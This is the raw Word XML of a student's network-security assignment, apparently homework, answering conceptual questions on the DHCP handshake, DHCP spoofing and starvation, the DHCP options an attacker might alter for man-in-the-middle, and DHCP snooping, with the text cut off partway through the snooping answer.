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15CDA" w14:textId="77777777" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
          <w:kern w:val="36"/>
          <w:sz w:val="43"/>
          <w:szCs w:val="43"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
          <w:kern w:val="36"/>
          <w:sz w:val="43"/>
          <w:szCs w:val="43"/>
        </w:rPr>
        <w:t>Assignment 0x04 - Network Attacks &amp; Web Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4113E50C" w14:textId="77777777" w:rsidR="00140708" w:rsidRDefault="00140708">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDE8A7E" w14:textId="77777777" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Part I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2073C6B0" w14:textId="77777777" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>1. (3 points) DHCP Attack 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149A0949" w14:textId="77777777" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Another type of attack that was not included in the workshop is DHCP (dynamic host configuration protocol) based attacks. Do a bit of research into how DHCP works and about some DHCP attacks and answer the following questions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7462E399" w14:textId="77777777" w:rsidR="00825934" w:rsidRPr="00DA58A4" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the 4 packets (messages) that are communicated between the client seeking and IP address and the DHCP server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62385C39" w14:textId="46D7A3CA" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="00A631BF" w:rsidP="00051D67">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidR="00051D67" w:rsidRPr="00051D67">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>DISCOVER</w:t>
      </w:r>
      <w:r w:rsidR="00051D67">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidR="00051D67" w:rsidRPr="00051D67">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>OFFER</w:t>
      </w:r>
      <w:r w:rsidR="00051D67">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidR="00051D67" w:rsidRPr="00051D67">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>REQUEST</w:t>
      </w:r>
      <w:r w:rsidR="00DA58A4">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A631BF">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>DHCPACK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A631BF">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA58A4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00DA58A4">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://upload.wikimedia.org/wikipedia/commons/thumb/e/e4/DHCP_session.svg/260px-DHCP_session.svg.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00DA58A4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DA58A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F5061C9" wp14:editId="58B18A30">
            <wp:extent cx="1712422" cy="2422009"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9760378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44950" cy="2609453"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00DA58A4">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C259A0" w14:textId="77777777" w:rsidR="00825934" w:rsidRPr="00DA58A4" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Are the 4 messages Layer 2 unicast or broadcast (be careful not to confuse between Layer 3 broadcast, which is sending to an IP broadcast address like 10.0.2.255, as opposed to Layer 2 broadcast which is sent to MAC address FF:FF:FF:FF:FF:FF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C793C1F" w14:textId="5A15983E" w:rsidR="00A631BF" w:rsidRPr="00A631BF" w:rsidRDefault="00A631BF" w:rsidP="00A631BF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A631BF">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve">DISCOVER and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A631BF">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>REQUEST messages are Layer 2 broadcasts sent to the MAC address FF:FF:FF:FF:FF:FF. This is necessary because the client does not yet have an IP address and thus cannot establish a Layer 3 connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1E3A5D" w14:textId="61BCB902" w:rsidR="00770067" w:rsidRPr="00825934" w:rsidRDefault="00A631BF" w:rsidP="00770067">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A631BF">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>OFFER and DHCPACK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A631BF">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A631BF">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>can be either broadcast or unicast, depending on the client's capabilities and the configuration of the DHCP server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A09B8DF" w14:textId="1471C2C3" w:rsidR="00825934" w:rsidRPr="00DA58A4" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Therefore, in a switched network, which of the 4 messages in the DHCP negotiation would the attacker be able to observe?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B57F30" w14:textId="77777777" w:rsidR="00D720DA" w:rsidRDefault="00D720DA" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D720DA">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In a switched network, because </w:t>
      </w:r>
      <w:r w:rsidRPr="00D720DA">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>DHCPDISCOVER</w:t>
      </w:r>
      <w:r w:rsidRPr="00D720DA">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D720DA">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>DHCPREQUEST</w:t>
      </w:r>
      <w:r w:rsidRPr="00D720DA">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> are Layer 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D720DA">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>broadcasts</w:t>
      </w:r>
      <w:r w:rsidRPr="00D720DA">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve">, these messages would be seen by all devices on the same VLAN. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9CD0F9" w14:textId="05E080AF" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="00D720DA" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D720DA">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>However, DHCPOFFER and DHCPACK might be directed only to the requesting client's MAC address (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D720DA">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>unicast</w:t>
      </w:r>
      <w:r w:rsidRPr="00D720DA">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>), limiting their observability to just the sender and the receiver, unless port mirroring or similar network monitoring is enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D971FB" w14:textId="77777777" w:rsidR="00825934" w:rsidRPr="00DA58A4" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Briefly explain what </w:t>
      </w:r>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>DHCP spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>DHCP starvation</w:t>
      </w:r>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks are executed, and how the two can be used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>combination</w:t>
      </w:r>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6272BE62" w14:textId="7CC46C08" w:rsidR="00ED480E" w:rsidRPr="00ED480E" w:rsidRDefault="00ED480E" w:rsidP="00ED480E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED480E">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>DHCP Spoofing Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED480E">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs when a malicious actor sets up a rogue DHCP server on the network that responds to DHCP requests. Unsuspecting clients might receive configuration from this rogue server, directing their traffic through an attacker-controlled gateway for man-in-the-middle (MITM) or other malicious purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FEA11F" w14:textId="5BD79ACE" w:rsidR="00ED480E" w:rsidRPr="00ED480E" w:rsidRDefault="00ED480E" w:rsidP="00ED480E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED480E">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>DHCP Starvation Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED480E">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> involves the attacker sending numerous DHCP requests with spoofed MAC addresses </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED480E">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED480E">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> exhaust the address space available on the DHCP server, preventing legitimate clients from obtaining IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A515E4F" w14:textId="51781533" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="00ED480E" w:rsidP="00ED480E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED480E">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>Combination</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED480E">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>: Combining these attacks, an attacker first uses DHCP starvation to deplete the server’s IP pool and then sets up a rogue server to respond to legitimate client requests, potentially taking control of their network configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3188AE" w14:textId="16E8C4DC" w:rsidR="00825934" w:rsidRPr="00DA58A4" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>For an adversary looking to perform MITM, which DHCP configuration option(s) would you try to manipulate?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B3BB23" w14:textId="34697957" w:rsidR="000B5380" w:rsidRPr="000B5380" w:rsidRDefault="000B5380" w:rsidP="000B5380">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B5380">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve">Option </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="000B5380">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Router): Modifying the default gateway address so that all traffic from the client is routed through an attacker-controlled device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3959AA" w14:textId="133A8EAE" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="000B5380" w:rsidP="000B5380">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B5380">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve">Option </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000B5380">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DNS Servers): Altering DNS server addresses to divert DNS requests to malicious servers for DNS spoofing or hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5E23A0" w14:textId="392D4575" w:rsidR="00825934" w:rsidRPr="00DA58A4" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Briefly explain how "DHCP </w:t>
      </w:r>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>snooping</w:t>
      </w:r>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>" configuration in a switch work to prevent DHCP </w:t>
      </w:r>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0972CDE7" w14:textId="0C52C405" w:rsidR="00825934" w:rsidRDefault="00834899" w:rsidP="00834899">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834899">
        <w:rPr>
